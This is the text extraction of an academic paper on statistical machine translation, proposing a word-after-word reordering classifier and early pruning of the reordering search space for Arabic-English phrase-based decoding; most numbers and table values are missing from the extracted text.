optimal trade- off between accuracy and complexity of de- coding is nowadays reached by harshly lim- iting the input permutation space. we pro- pose a method to dynamically shape such space and, thus, capture long-range word movements without hurting translation qual- ity nor decoding time. the space defined by loose reordering constraints is dynamically pruned through a binary classifier that predicts whether a given input word should be trans- lated right after another. the integration of this model into a phrase-based decoder im- proves a strong arabic-english baseline al- ready including state-of-the-art early distor- tion cost (moore and quirk, ) and hierar- chical phrase orientation models (galley and manning, ). significant improvements in the reordering of verbs are achieved by a sys- tem that is notably faster than the baseline, while bleu and meteor remain stable, or even increase, at a very high distortion limit. introduction word order differences are among the most impor- tant factors determining the performance of statisti- cal machine translation (smt) on a given language pair (birch et al., ). this is particularly true in the framework of phrase-based smt (psmt) (zens et al., ; koehn et al., ; och and ney, ), an approach that remains highly competitive despite the recent advances of the tree-based approaches. 
during the psmt decoding process, the output sentence is built from left to right, while the input sentence positions can be covered in different or- ders. thus, reordering in psmt can be viewed as the problem of choosing the input permutation that leads to the highest-scoring output sentence. due to efficiency reasons, however, the input permutation space cannot be fully explored, and is therefore lim- ited with hard reordering constraints. although many solutions have been proposed to explicitly model word reordering during decoding, psmt still largely fails to handle long-range word movements in language pairs with different syntac- tic structures . we believe this is mostly not due to deficiencies of the existing reordering models, but rather to a very coarse definition of the reorder- ing search space. indeed, the existing reordering constraints are rather simple and typically based on word-to-word distances. moreover, they are uni- form throughout the input sentence and insensitive to the actual words being translated. relaxing this kind of constraints means dramatically increasing the size of the search space and making the reorder- ing model’s task extremely complex. as a result, even in language pairs where long reordering is reg- ularly observed, psmt quality degrades when long word movements are allowed to the decoder. we address this problem by training a binary classifier to predict whether a given input position should be translated right after another, given the words at those positions and their contexts. when this model is integrated into the decoder, its predic- for empirical evidence, see for instance (birch et al., ; galley and manning, ; bisazza and federico, ). transactions of the association for computational linguistics, ( ) – . action editor: philipp koehn. submitted / ; revised / ; published / . c© association for computational linguistics. tions can be used not only as an additional feature function, but also as an early indication of whether or not a given reordering path should be further ex- plored. more specifically, at each hypothesis ex- pansion, we consider the set of input positions that are reachable according to the usual reordering con- straints, and prune it based only on the reorder- ing model score. then, the hypothesis can be ex- panded normally by covering the non-pruned posi- tions. this technique makes it possible to dynami- cally shape the search space while decoding with a very high distortion limit, which can improve trans- lation quality and efficiency at the same time. the remainder of the paper is organized as fol- lows. after an overview of the relevant literature, we describe in detail our word reordering model. in the following section, we introduce early pruning of reordering steps as a way to dynamically shape the input permutation space. finally, we present an em- pirical analysis of our approach, including intrinsic evaluation of the model and smt experiments on a well-known arabic-english news translation task. previous work in this paper, we focus on methods that guide the reordering search during the phrase-based decoding process. see for instance (costa-jussà and fonol- losa, ) for a review of pre- and post-reordering approaches that are not treated here. assuming a one-to-one correspondence between source and target phrases, reordering in psmt can be viewed as the problem of searching through a set of permutations of the input sentence. 
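with its subscripts restored, the distortion cost above appears to be d(f̃_{i−1}, f̃_i) = exp(−|start(f̃_i) − end(f̃_{i−1}) − 1|), i.e., an exponential penalty on the size of the jump between consecutively translated phrases. a minimal sketch, assuming phrase spans are given as (start, end) source positions:

```python
import math

def distortion(prev_span, cur_span):
    """|start(f_i) - end(f_{i-1}) - 1|: zero when the current phrase
    directly continues from the previously translated one."""
    (_, prev_end), (cur_start, _) = prev_span, cur_span
    return abs(cur_start - prev_end - 1)

def distortion_cost(prev_span, cur_span):
    """Exponential distortion penalty of the original phrase-based model."""
    return math.exp(-distortion(prev_span, cur_span))
```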
thus, two sub-problems arise: defining the set of allowed per- mutations (reordering constraints) and scoring the allowed permutations according to some likelihood criterion (reordering model). we begin with the lat- ter, returning to the constraints later in this section. . reordering modeling in its original formulation, the psmt approach includes a basic reordering model, called distor- tion cost, that exponentially penalizes longer jumps among consecutively translated phrases (f̃i! , f̃i): d(f̃i! , f̃i) = e !|start(f̃i) ! end(f̃i! ) ! | a number of more sophisticated solutions have been proposed to explicitly model word reorder- ing during decoding. these can mostly be grouped into three families: phrase orientation models, jump models and source decoding sequence models. phrase orientation models (tillmann, ; koehn et al., ; zens and ney, ; galley and manning, ), also known as lexicalized reorder- ing models, predict the orientation of a phrase with respect to the last translated one, by classifying it as monotone, swap or discontinuous. these mod- els have proven very useful for short and medium- range reordering and are among the most widely used in psmt. however, their coarse classification of reordering steps makes them unsuitable to predict long-range reorderings. jump models (al-onaizan and papineni, ; green et al., ; yahyaei and monz, ) predict the direction and length of a jump to perform after a given input word . both these works achieve their best arabic-english results within a rather small dl: namely, in (al-onaizan and papineni, ) and in (green et al., ), thus failing to capture the rare but crucial long reorderings that were their main motivation. a drawback of this approach is that long jumps are typically penalized because of their low frequency compared to short jumps. this strong bias is undesirable, given that we are especially in- terested in detecting probable long reorderings. source decoding sequence models predict which input word is likely to be translated at a given state of decoding. for instance, reordered source lan- guage models (feng et al., ) are smoothed n- gram models trained on a corpus of source sentences reordered to match the target word order. when inte- grated into the smt system, they assign a probabil- ity to each newly translated word given the n- pre- viously translated words. finally, source word pair reordering models (visweswariah et al., ) esti- mate, for each pair of input words i and j, the cost of translating j right after i given various features of i, j and their respective contexts. differently from reordered source lms, these models are discrimina- tive and can profit from richer feature sets. at the same time, they do not employ decoding history- based features, which allows for more effective hy- in this paper, input (or source) word denotes the word at a given position of the input sentence, rather than a word type. pothesis recombination. the model we are going to present belongs to this last sub-group, which we find especially suitable to predict long reorderings. . reordering constraints the reordering constraint originally included in the psmt framework and implemented in our reference toolkit, moses (koehn et al., ), is called dis- tortion limit (dl). this consists in allowing the de- coder to skip, or jump, at most k words from the last translated phrase to the next one. more precisely, the limit is imposed on the distortion d between consec- utively translated phrases (f̃i! , f̃i): d(f̃i! , f̃i) = !!!start(f̃i) ! 
end(f̃_{i-1}) − 1 | ≤ dl

that is, the jump between the end of the last translated phrase and the start of the next one may not exceed dl words. limiting the input permutation space is necessary for beam-search psmt decoders to function in linear time. reordering constraints are also important for translation quality because the existing models are typically not discriminative enough to guide the search over very large sets of reordering hypotheses. despite their crucial effects on the complexity of reordering modeling, though, reordering constraints have drawn less attention in the literature. the existing reordering constraints are typically based on word-to-word distances – ibm (berger et al., ) and dl (koehn et al., ) – or on permutation patterns – itg (wu, ). both kinds of constraints are uniform throughout the input sentence, and insensitive to the word being translated and to its context. this results in a very coarse definition of the reordering search space, which is problematic in language pairs with different syntactic structures.

to address this problem, yahyaei and monz ( ) present a technique to dynamically set the dl: they train a classifier to predict the most probable jump length after each input word, and use the predicted value as the dl after that position. unfortunately, this method can generate inconsistent constraints leading to decoding dead-ends. as a solution, the dynamic dl is relaxed when needed to reach the first uncovered position. translation improvements are reported only on a small-scale task with short sentences (btec), over a baseline that includes a very simple reordering model. in our work we develop this idea further and use a reordering model to predict which specific input words, rather than input intervals, are likely to be translated next. moreover, our solution is not affected by the constraint inconsistency problem (see sect. ).

in another related work, bisazza and federico ( ) generate likely reorderings of the input sentence by means of language-specific fuzzy rules based on shallow syntax. long jumps are then suggested to the psmt decoder by reducing the distortion cost for specific pairs of input words. in comparison to the dynamic dl, this is a much finer way to define the reordering space, leading to consistent improvements of both translation quality and efficiency over a strong baseline. however, the need for specific reordering rules makes the method harder to apply to new language pairs.

the waw reordering model

we model reordering as the problem of deciding whether a given input word should be translated after another (word-after-word). this formulation is particularly suitable to help the decoder decide whether a reordering path is promising enough to be further explored. moreover, when translating a sentence, choosing the next source word to translate appears as a more natural problem than guessing how much to the left or to the right we should move from the current source position. the waw reordering model addresses a binary decision task through the following maximum-entropy classifier:

p(r_{i,j} = y \mid f_1^J, i, j) = \frac{\exp\big[\sum_m \lambda_m h_m(f_1^J, i, j, r_{i,j}{=}y)\big]}{\sum_{y'} \exp\big[\sum_m \lambda_m h_m(f_1^J, i, j, r_{i,j}{=}y')\big]}

where f_1^J is a source sentence of J words, h_m are feature functions and λ_m the corresponding feature weights. the outcome y can be either 1 or 0, with r_{i,j} = 1 meaning that the word at position j is translated right after the word at position i. our waw reordering model is strongly related to that of visweswariah et al.
( ) – hereby called travelling salesman problem (tsp) model – with few important differences: (i) we do not include in the features any explicit indication of the jump length, in order to avoid the bias on short jumps; (ii) they train a linear model with mira (cram- mer and singer, ) by minimizing the number of input words that get placed after the wrong po- sition, while we use a maximum-entropy classifier trained by maximum-likelihood; (iii) they use an off-the shelf tsp solver to find the best source sen- tence permutation and apply it as pre-processing to training and test data. by contrast, we integrate the maximum-entropy classifier directly into the smt decoder and let all its other models (phrase orien- tation, translation, target lm etc.) contribute to the final reordering decision. . features like the tsp model (visweswariah et al., ), the waw model builds on binary features similar to those typically employed for dependency parsing (mcdonald et al., ): namely, combinations of surface forms or pos tags of the words i and j and their context. our feature templates are presented in table . the main novelties with respect to the tsp model are the mixed word-pos templates (rows - ) and the shallow syntax features. in particular, we use the chunk types of i, j and their context ( - ), as well as the chunk head words of i and j ( ). fi- nally we add a feature to indicate whether the words i and j belong to the same chunk ( ). the jump orientation – forward/backward – is included in the features that represent the words comprised between i and j (rows , , , ). no explicit indication of the jump length is included in any feature. . training data to generate training data for the classifier, we first extract reference reorderings from a word-aligned parallel corpus. given a parallel sentence, differ- ent heuristics may be used to convert arbitrary word alignments to a source permutation (birch et al., ; feng et al., ; visweswariah et al., ). similarly to this last work, we compute for each source word fi the mean ai of the target positions aligned to fi, then sort the source words according to this value. as a difference, though, we do not discard unaligned words but assign them the mean using the mean of the aligned indices makes the gener- ation of reference permutations more robust to alignment er- rors. admittedly, this heuristic does not handle well the case of source words that are correctly aligned to non-consecutive tar- get words. however, this phenomenon is also not captured by standard psmt models, who only learn continuous phrases. i! i! i i+ b j! j j+ w w w w w w w w w w w w w w w w w w w w wall w w p p p p p p p p p p p p p p p p p p p p p p p p p p pall p p w p p w c c c c c c c c h h belong to same chunk(i, j)? w: word identity, p: pos tag, c: chunk type, h: chunk head table : feature templates used to learn whether a source position j is to be translated right after i. positions com- prised between i and j are denoted by b and generate two feature templates: one for each position ( and ) and one for the concatentation of them all ( and ). of their neighbouring words’ alignment means, so that a complete permutation of the source sentence (") is obtained. table (a) illustrates this procedure. given the reference permutation, we then gener- ate positive and negative training samples by simu- lating the decoding process. 
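before turning to the sample generation, the conversion from word alignments to a reference source permutation described above can be sketched as follows. this is an illustrative reimplementation rather than the authors' code, and the names are our own: each source position receives the mean of its aligned target positions, unaligned positions inherit the mean of their neighbours' values, and the source positions are then sorted by this value.

def alignment_to_permutation(n_src, links):
    # links: list of (source_position, target_position) pairs, 0-based
    means = [None] * n_src
    for i in range(n_src):
        tgt = [t for s, t in links if s == i]
        if tgt:
            means[i] = sum(tgt) / len(tgt)
    # unaligned words take the mean of their neighbours' alignment means
    for i in range(n_src):
        if means[i] is None:
            left = next((means[k] for k in range(i - 1, -1, -1)
                         if means[k] is not None), None)
            right = next((means[k] for k in range(i + 1, n_src)
                          if means[k] is not None), None)
            known = [v for v in (left, right) if v is not None]
            means[i] = sum(known) / len(known) if known else float(i)
    # stable sort: ties keep the original (monotone) order
    return sorted(range(n_src), key=lambda i: means[i])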
we traverse the source positions in the order defined by ", keeping track of the positions that have already been covered and, for each t : " t " j , generate: • one positive sample (r!t,!t+ = ) for the source position that comes right after it, • a negative sample (r!t,u= ) for each source position in {u : "t!#+ < u < "t+#+ # u $= "t+ } that has not yet been translated. here, the sampling window # serves to control the size of the training data and the proportion between positive and negative samples. its value naturally correlates with the dl used in decoding. the gener- ation of training samples is illustrated by table (b). (a) converting word alignments to a permutation: source words are sorted by their target alignments mean a. the unaligned word “d” is assigned the mean of its neighbouring words’ a values ( + )/ = . : (b) generating binary samples by simulating the decoding process: shaded rounds represent cov- ered positions, while dashed arrows represent negative samples: table : the classifier’s training data generation process. . integration into phrase-based decoding rather than using the new reordering model for data pre-processing as done by (visweswariah et al., ), we directly integrate it into the psmt de- coder moses (koehn et al., ). two main computation phases are required by the waw model: (i) at system initialization time, all fea- ture weights are loaded into memory, and (ii) before translating each new sentence, features are extracted from it and model probabilities are pre-computed for each pair of source positions (i, j) such that |j ! i ! | " dl. note that this efficient solution is possible because our model does not employ de- coding history-based features, like the word that was translated before the last one, or like the previous jump legth. this is an important difference with re- spect to the reordered source lm proposed by feng et al. ( ), which requires inclusion of the last n translated words in the decoder state. fig. illustrates the scoring process: when a par- tial translation hypothesis h is expanded by cover- ing a new source phrase f̃ , the model returns the log-probability of translating the words of f̃ in that particular order, just after the last translated word of h. in details, this is done by converting the phrase- internal word alignment to a source permutation, in just the same way it was done to produce the model’s training examples. thus, the global score is inde- pendent from phrase segmentation, and normalized across outputs of different lengths: that is, the proba- bility of any complete hypothesis decomposes into j factors, where j is the length of the input sentence. the waw reordering model is fully compatible with, and complementary to the lexicalized reorder- ing (phrase orientation) models included in moses. figure : integrating the binary word reordering model into a phrase-based decoder: when a new phrase is covered (dashed boxes), the model returns the log- probability of translating its words in the order defined by the phrase-internal word alignment. early pruning of reordering steps we now explain how the waw reordering model can be used to dynamically refine the input permutation space. this method is not dependent on the particu- lar classifier described in this paper, but can in prin- ciple work with any device estimating the probabil- ity of translating a given input word after another. 
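a minimal sketch of the scoring step just described: when a hypothesis is extended with a new phrase, the phrase-internal word alignment is converted to a permutation (in the same way as for the training data) and the waw log-probabilities of the resulting word-after-word steps are summed. the function below is illustrative; it assumes that the internal translation order has already been derived from the phrase-internal alignment, and that waw_logprob returns the model's log-probability for a pair of absolute input positions.

def score_phrase_expansion(last_covered, phrase_start, internal_order, waw_logprob):
    # internal_order: order in which the phrase's source words are translated,
    # derived from the phrase-internal word alignment (see the conversion above).
    # waw_logprob(i, j): log p(r_{i,j} = 1) for absolute input positions i, j.
    score, prev = 0.0, last_covered
    for offset in internal_order:
        cur = phrase_start + offset
        score += waw_logprob(prev, cur)
        prev = cur
    return score

because the score decomposes over single word-after-word steps, the total over a complete hypothesis is independent of the phrase segmentation, as stated above.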
the method consists of querying the reordering model at the time of hypothesis expansion, and fil- tering out hypotheses solely based on their reorder- ing score. the rationale is to avoid costly hypoth- esis expansions for those source positions that the reordering model considers very unlikely to be cov- ered at a given point of decoding. in practice, this works as follows: • at each hypothesis expansion, we first enumer- ate the set of uncovered input positions that are reachable within a fixed dl, and query the waw reordering model for each of them ; phrase-internal alignments are provided in the phrase table. the score used to prune a new word range f̃ is the log prob- ability of translating the first aligned word of f̃ right after the last translated word of the current hypothesis. see also sect. . . • only based on the waw score, we apply his- togram and threshold pruning to this set and proceed to expand the non-pruned positions. furthermore, it is possible to ensure that local re- orderings are always allowed, by setting a so-called non-prunable-zone of width $ around the last cov- ered input position. according to how the dl, pruning parameters, and $ are set, we can actually aim at different tar- gets: with a low dl, loose pruning parameters, and $= we can try to speed up search without sacrific- ing much translation quality. with a high dl, strict pruning parameters, and a medium $, we ensure that the standard medium-range reordering space is ex- plored, as well as those few long jumps that are promising according to the reordering model. in our experiments, we explore this second option with the setting dl= and $= . the underlying idea is similar to that of early pruning proposed by moore and quirk ( ), which consisted in discarding possible extensions of a partial hypothesis based on their estimated score before computing the exact language model score. our technique too has the effect of introducing ad- ditional points at which the search space is pruned. however, while theirs was mainly an optimization technique meant to avoid useless lm queries, we in- stead aim at refining the search space by exploiting the fact that some smt models are more important than others at different stages of the translation pro- cess. our approach actually involves a continuous alternation of two processes: during hypothesis ex- pansion the reordering score is combined with all other scores, while during early pruning some re- ordering decisions are taken only based on the re- ordering score. in this way, we try to combine the benefits of fully integrated reordering models with those of monolingual pre-ordering methods. evaluation we test our approach on an arabic-english news translation task where sentences are typically long and complex. in this language pair, long reorder- ing errors mostly concern verbs, as all of subject- verb-object (svo), vso and, more rarerly, vos see bisazza ( ) for technical details on the integration of word-level pruning with phrase-level hypothesis expansion. constructions are attested in modern written ara- bic. this issue is well known in the smt field and was addressed by several recent works, with deep or shallow parsing-based techniques (green et al., ; carpuat et al., ; andreas et al., ; bisazza et al., ). we question whether our ap- proach – which is not conceived to solve this spe- cific problem, nor requires manual rules to predict verb reordering – will succeed in improving long re- ordering in a fully data-driven way. 
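before turning to the evaluation, the early pruning step described above can be sketched as below. waw_score(i, j) stands for the reordering model's log-probability of translating position j right after position i; the histogram size, relative threshold and non-prunable-zone width are illustrative defaults rather than the values tuned in the experiments, and the distortion computation follows the word-level reading of the standard definition.

import math

def expandable_positions(last_pos, uncovered, waw_score, dl,
                         histogram=5, threshold=0.25, zone=2):
    # positions reachable under the distortion limit
    reachable = [j for j in uncovered if abs(j - last_pos - 1) <= dl]
    if not reachable:
        return []
    # rank the reachable positions by the reordering model alone
    ranked = sorted(reachable, key=lambda j: waw_score(last_pos, j), reverse=True)
    best = waw_score(last_pos, ranked[0])
    kept = []
    for rank, j in enumerate(ranked):
        in_zone = abs(j - last_pos) <= zone        # local reordering is always allowed
        good_enough = (rank < histogram and
                       waw_score(last_pos, j) >= best + math.log(threshold))
        if in_zone or good_enough:
            kept.append(j)
    return kept

the decoder then expands the current hypothesis only over the returned positions, which is how the search space is reshaped on the fly even under a very high dl.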
as smt training data, we use all the in-domain parallel data provided for the nist-mt evalua- tion for a total of k sentence pairs ( m english words). the target lm used to run the main se- ries of experiments is trained on the english side of all available nist-mt parallel data, un included ( m words). in the large-scale experiments, the lm training data also include the sections of the en- glish gigaword that best fit to the development data in terms of perplexity: namely, the agence france- presse, xinhua news agency and associated press worldstream sections ( m words in total). for development and test, we use the newswire sections of the nist benchmarks: dev -nw, eval - nw, eval -nw consisting of , , sen- tences respectively. each set includes reference translations and the average sentence length is words. to focus the evaluation on problematic re- ordering, we also consider a subset of eval -nw containing only sentences where the arabic main verb is placed before the subject (vs- : sent.). as pre-processing, we apply standard tokeniza- tion to the english data, while the arabic data is segmented with amira (diab et al., ) accord- ing to the atb scheme . the same tool also pro- duces pos tagging and shallow syntax annotation. the in-domain parallel data includes all the provided cor- pora except the un proceedings, and the non-newswire parts of the small gale-y -q corpus (that is k sentences of audio transcripts and web data). as reported by green et al. ( ) the removal of un data does not affect baseline performances on the news benchmarks. automatically detected by means of shallow syntax rules. the arabic treebank tokenization scheme isolates con- junctions w+ and f+, prepositions l+, k+, b+, future marker s+, pronominal suffixes, but not the article al+. . reordering model intrinsic evaluation before proceeding to the smt experiments, we evaluate the performance of the waw reorder- ing model in isolation. all the tested configura- tions are trained with the freely available megam toolkit , implementing the conjugate gradient method (hestenes and stiefel, ), in maximum iterations. training samples are generated within a sampling window of width #= , from a subset ( k sentences) of the parallel data described above, resulting in m training word pairs . test samples are generated from tides-mt ( sen- tences, k samples with #= ), one of the corpora included in our smt training data. features with less than occurrences are ignored. classification accuracy. table presents preci- sion, recall, and f-score achieved by different fea- ture subsets, where w stands for word-based, p for pos-based and c for chunk-based feature templates. we can see that all feature types contribute to im- prove the classifier’s performance. the word-based model achieves the highest precision but a very low recall, while the pos-based has much more bal- anced scores. a better performance overall is ob- tained by combining word-, pos- and mixed word- pos-based features ( . % f-score). finally, the addition of chunk-based features yields a further im- provement of about point, reaching . % f-score. given these results, we decide to use the w,p,c model for the rest of the evaluation. features (templates) p r f w [ - ] . . . p [ - ] . . . w,p [ - ] . . . w,p,c [ - ] . . . table : classification accuracy of the waw reordering model on tides-mt , using different feature subsets. the template numbers refer to the rows of table . ranking accuracy. 
a more important aspect to evaluate for our application is how well our model’s scores can rank a typical set of reordering options. in fact, the waw model is not meant to be used as http://www.cs.utah.edu/˜hal/megam/ (daumé iii, ). this is the maximum number of samples manageable by megam. however, even scaling from m to m was only slightly helpful in our experiments. in the future we plan to test other learning approaches that scale better to large data sets. a stand-alone classifier, but as one of several smt feature functions. moreover, for early reordering pruning to be effective, it is especially important that the correct reordering option be ranked in the top n among those available at the time of a given hypoth- esis expansion. in order to measure this, we simulate the decoding process by traversing the source words in target order and, for each of them, we examine the ranking of all words that may be translated next (i. e. the uncovered positions within a given dl). we check how often the correct jump was ranked first (top- ) or at most third (top- ). we also com- pute the latter score on long reorderings only (top- -long): i. e. backward jumps with distortion d> and forward jumps with d> . in table , results are compared with the ranking produced by standard distortion, which always favors shorter jumps. two conditions are considered: dl= corresponding to the sampling window # used to produce the training data, and dl= that is the maximum distortion of jumps that will be considered in our early-pruning smt experiment. model dl dl-err top- top- top- -long back forw. distortion . . . . . . . . . . waw . . . . . . . . . . table : word-to-word jump ranking accuracy (%) of standard distortion and waw reordering model, in dif- ferent dl conditions. dl-err is the percentage of correct jumps beyond dl. the test set consists of k reordering decisions: one for each source word in tides-mt . we can see that, in terms of overall accuracies, the waw reordering model outperforms standard distor- tion by a large margin (about % absolute). this is an important result, considering that the jump length, strongly correlating with the jump likeli- hood, is not directly known to our model. as re- gards the dl, the higher limit naturally results in a lower dl-error rate (percentage of correct jumps be- yond dl): namely . % instead of . %. however, jump prediction becomes much harder: top- accu- racy of long jumps by distortion drops from . % to . % (backward) and from . % to . % (for- ward). our model is remarkably robust to this effect on backward jumps, where it achieves . % accu- racy. due to the syntactic characteristics of arabic and english, the typical long reordering pattern con- sists in (i) skipping a clause-initial arabic verb, (ii) covering a long subject, then finally (iii) jumping back to translate the verb and (iv) jumping forward to continue translating the rest of the sentence (see fig. for an example). deciding when to jump back to cover the verb (iii) is the hardest part of this process, and that is precisely where our model seems more helpful, while distortion always prefers to proceed monotonically achieving a very low ac- curacy of . %. in the case of long forward jumps (iv), instead, distortion is advantaged as the correct choice typically corresponds to translating the first uncovered position, that is the shortest jump avail- able from the last translated word. even here, our model achieves an accuracy of . %, only slightly lower than that of distortion ( . %). 
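the ranking evaluation described in this subsection amounts to simulating decoding along the reference permutation and checking, at each step, where the correct next position ends up in the model's ranking of the reachable uncovered positions. the sketch below is an illustrative reimplementation; the distortion baseline corresponds to score(i, j) = -abs(j - i - 1).

def jump_ranking_accuracy(perms, score, dl, top_n=3):
    # perms: reference permutations, one per sentence; score(i, j): model score
    # for translating position j right after position i.
    top1 = topn = dl_err = total = 0
    for perm in perms:
        covered = set()
        for t in range(len(perm) - 1):
            i, gold = perm[t], perm[t + 1]
            covered.add(i)
            total += 1
            candidates = [j for j in range(len(perm))
                          if j not in covered and abs(j - i - 1) <= dl]
            if gold not in candidates:
                dl_err += 1       # the correct jump lies beyond the distortion limit
                continue
            ranked = sorted(candidates, key=lambda j: score(i, j), reverse=True)
            top1 += ranked[0] == gold
            topn += gold in ranked[:top_n]
    return top1 / total, topn / total, dl_err / total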
in summary, the waw reordering model significantly outperforms distortion in the ranking of long jumps. in the large majority of cases, it is able to rank a correct long jump in the top reordering options, which suggests that it can be effectively used for early reordering pruning. (clearly, we would expect different figures from testing the model on another language pair like german-english, where the verb is often postponed in the source with respect to the target.)

. smt experimental setup

our smt systems are built with the moses toolkit, while word alignment is produced by the berkeley aligner (liang et al., ). the baseline decoder includes a phrase translation model, a lexicalized reordering model, a -gram target language model, distortion cost, word and phrase penalties. more specifically, the baseline reordering model is a hierarchical phrase orientation model (tillmann, ; koehn et al., ; galley and manning, ) trained on all the available parallel data. this variant was shown to outperform the default word-based one on an arabic-english task. to make our baseline even more competitive, we apply early distortion cost, as proposed by moore and quirk ( ). this function has the same value as the standard one over a complete translation hypothesis, but it anticipates the gradual accumulation of the cost, making hypotheses of the same length more comparable to one another. note that this option has no effect on the distortion limit, but only on the distortion cost feature function. as proposed by johnson et al. ( ), statistically improbable phrase pairs are removed from the translation model. the language models are estimated by the irstlm toolkit (federico et al., ) with modified kneser-ney smoothing (chen and goodman, ). feature weights are optimized by minimum bleu-error training (och, ) on dev -nw. to reduce the effects of the optimizer instability, we tune each configuration four times and use the average of the resulting weight vectors to translate the test sets, as suggested by cettolo et al. ( ). finally, eval -nw is used to select the early pruning parameters for the last experiment, while eval -nw is always reserved as blind test.

. evaluation metrics

we evaluate global translation quality with bleu (papineni et al., ) and meteor (banerjee and lavie, ). these metrics, though, are only indirectly sensitive to word order, and especially unlikely to capture improvements at the level of long-range reordering. for this reason, we also compute the kendall reordering score or krs (birch et al., ), which is a positive score based on the kendall's tau distance between the source-output permutation σ and the source-reference permutation π:

\mathrm{KRS}(\sigma, \pi) = \left(1 - \sqrt{k(\sigma, \pi)}\right) \cdot \mathrm{BP}

k(\sigma, \pi) = \frac{\sum_{i=1}^{n} \sum_{j=1}^{n} d(i,j)}{n(n-1)/2}

d(i,j) = \begin{cases} 1 & \text{if } \sigma_i < \sigma_j \text{ and } \pi_i > \pi_j \\ 0 & \text{otherwise} \end{cases}

where bp is a sentence-level brevity penalty, similar to that of bleu. the krs is robust to lexical choice because it performs no comparison between output and reference words, but only between the positions of their translations. besides, it was shown to correlate strongly with human judgements of fluency. our work specifically addresses long-range reordering phenomena in language pairs where these are quite rare, although crucial for preserving the source text meaning. hence, an improvement at this level may not be detected by the general-purpose metrics. we then develop a krs variant that is only sensitive to the positioning of specific input words. assuming that each input word f_i is assigned a weight w_i, the formula above is modified as follows:

d_w(i,j) = \begin{cases} w_i + w_j & \text{if } \sigma_i < \sigma_j \text{ and } \pi_i > \pi_j \\ 0 & \text{otherwise} \end{cases}

a similar element-weighted version of kendall tau was proposed by kumar and vassilvitskii ( ) to evaluate document rankings in information retrieval. because long reordering errors in arabic-english mostly affect verbs, we set the weights to 1 for verbs and 0 for all other words to only capture verb reordering errors, and call the resulting metric krs-v. the source-reference word alignments needed to compute the reordering scores are generated by the berkeley aligner previously trained on the training data. source-output word alignments are instead obtained from the decoder's trace.

. results and discussion

to motivate the choice of our baseline setup (early distortion cost and dl= ), we first compare the performance of standard and early distortion costs under various dl conditions.

figure : standard vs early distortion cost results on eval -nw under different distortion limits (dl), using the medium-size lm. best scores are on top-right corner.

as shown in fig. , most results are close to each other in terms of bleu and krs, but early distortion consistently outperforms the standard one (statistically significant). the most striking difference appears at a very high distortion limit ( ), where standard distortion scores drop by more than bleu point and almost krs points! early distortion is much more robust (only - krs when going from dl= to dl= ), which makes our baseline system especially strong at the level of reordering.

table presents the results obtained by integrating the waw reordering model as an additional feature function, and by applying early reordering pruning. the upper part of the table refers to the medium-scale evaluation, while the lower part refers to the large-scale evaluation. in each part, statistical significance is computed against the baseline [b] by approximate randomization as in (riezler and maxwell, ). run times are obtained by an intel xeon x processor on the first sentences of eval -nw, and exclude loading time of all models.

medium-scale evaluation. integrating the waw model as an additional feature function results in small but consistent improvements in all dl conditions, which shows that this type of model conveys information that is missing from the state-of-the-art reordering models. as regards efficiency, the new model makes decoding time increase by %. among the dl settings considered, dl= is confirmed as the optimal one – with or without the waw model. raising the dl to with no special pruning has a negative impact on both translation quality and efficiency. the effect is especially visible on the reordering scores: that is, from . to . krs and from . to . krs-v on eval -nw. run times are almost doubled: from to and from to ms/word, that is a % increase. we then proceed to the last experiment where the reordering space is dynamically pruned based on the waw model score. as explained in sect. , a non-prunable-zone of width $= is set around the last covered position. to set the early pruning parameters, we perform a grid search over the values ( , , , , ) for histogram and ( . , . , . ) for relative threshold, and select the values that achieve the best bleu and krs on eval -nw, namely (histogram) and . (threshold).
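for reference, the kendall reordering score and the verb-weighted variant krs-v defined in the evaluation-metrics subsection can be sketched as follows; normalising the weighted variant over the total pair weight and omitting the brevity penalty are our own simplifications, not details taken from the paper.

import math

def krs(sigma, pi, weights=None, brevity_penalty=1.0):
    # sigma: source-output permutation, pi: source-reference permutation,
    # both lists mapping source position -> rank.
    # weights: per-word weights, e.g. 1.0 for verbs and 0.0 otherwise (krs-v).
    n = len(sigma)
    w = weights if weights is not None else [1.0] * n
    discordant = total = 0.0
    for i in range(n):
        for j in range(n):
            if sigma[i] < sigma[j]:            # each unordered pair counted once
                pair_weight = w[i] + w[j]
                total += pair_weight
                if pi[i] > pi[j]:
                    discordant += pair_weight
    k = discordant / total if total else 0.0
    return (1.0 - math.sqrt(k)) * brevity_penalty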
the resulting configu- ration is then re-optimized by mert on dev -nw. this setting implies that, at a given point of decod- ing where i is the last covered position, a new word can be translated only if: • it lies within a dl of from i, or • it lies within a dl of from i and its waw reordering score is among the top and at least equal to / of the best score (in linear space). as shown in table , early pruning achieves the best results overall: despite the high dl, we report dl reo.models eval -nw eval -nw vs- ms/ bleu met krs krs-v bleu met krs krs-v krs-v word using the medium-size lm ( m english tokens): hier.lexreo, early disto . . ! . ! . ! . " . . . . + waw model . . . . . # . # . # . $ . # hier.lexreo, early disto[b] . . . . . . . . . + waw model . . . $ . . # . # . # . # . # hier.lexreo, early disto . . ! . ! . ! . . " . ! . " . " + waw model . . . ! . . $ . # . " . . + early reo.pruning($= ) . . . $ . # . . # . . # . # using the large interpolated lm ( m english tokens) and double beam-size: hier.lexreo, early disto[b] . . . . . . . . . hier.lexreo, early disto . " . ! . ! . ! . . ! . ! . ! . ! +waw+reo.pruning($= ) . . . . # . # . # . . # . # table : effects of waw reordering modeling and early reordering pruning on translation quality, measured with % bleu, meteor, and kendall reordering score: regular (krs) and verb-specific (krs-v). statistically significant differences with respect to the baseline [b] are marked with #! at the p " . level and $" at the p " . level. decoding time is measured in milliseconds per input word. no loss in bleu, meteor and krs, but we actually see several improvements. in particular, the gains on the blind test eval -nw are + . bleu, + . me- teor and + . krs (only meteor is significant). while these gains are admittedly small, we recall that our techniques affect rare and isolated events which can hardly emerge from the general-purpose evaluation metrics. moreover, to our knowledge, this is the first time that a psmt system is shown to maintain a good performance on this language pair while admitting very long-range reorderings. finally and more importantly, the reordering of verbs improves significantly on both generic tests and on the vs- sentence subset (vs- ): namely, in the latter, we achieve a notable gain of . krs-v. efficiency is also largely improved by our early reordering pruning technique: decoding time is re- duced to ms/word, corresponding to a % speed-up over the baseline. large-scale evaluation. we also investigate whether our methods can be useful in a scenario where efficiency is less important and more data is available for training. to this end, we build a very large lm by interpolating the main lm with three other lms trained on different gigaword sec- tions (see sect. ). moreover, we relax the decoder’s beam size from the default value of to hy- potheses, to reduce the risk of search errors and ob- tain the best possible baseline performance. by comparing the large-scale with the medium- scale baseline in table , we note that the addition of lm data is especially beneficial for bleu (+ . on eval -nw and + . on eval -nw), but not as much for the other metrics, which challenges the commonly held idea that more data always improves translation 